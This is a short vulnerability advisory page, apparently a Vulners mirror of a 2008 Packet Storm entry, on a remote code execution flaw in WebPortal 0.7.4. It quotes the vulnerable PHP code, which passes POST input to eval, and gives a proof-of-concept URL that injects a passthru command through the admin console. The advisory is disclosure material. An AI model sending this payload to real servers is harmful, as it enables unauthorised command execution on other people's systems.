Lucene search

K

webportalcms-exec.txt

๐Ÿ—“๏ธย 24 Sep 2008ย 00:00:00Reported byย GolD_MTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 15ย Views

WebPortal version 0.7.4 Remote Code Execution Vulnerabilit

Show more
Code
`WebPortal <= 0.7.4 (code) Remote Code Execution Vulnerability  
Download : http://webportal.ivanoculmine.com/download.php?mid=14  
Vuln :  
######################################################################  
<?  
if ($_GET["action"] == "execute") {  
eval (stripslashes($_POST["code"]));  
}  
?>  
######################################################################  
POC :  
/index.php?m=admin&f=console&action=execute&code=(id);} passthru(id);  
######################################################################  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
24 Sep 2008 00:00Current
7.4High risk
Vulners AI Score7.4
15
.json
Report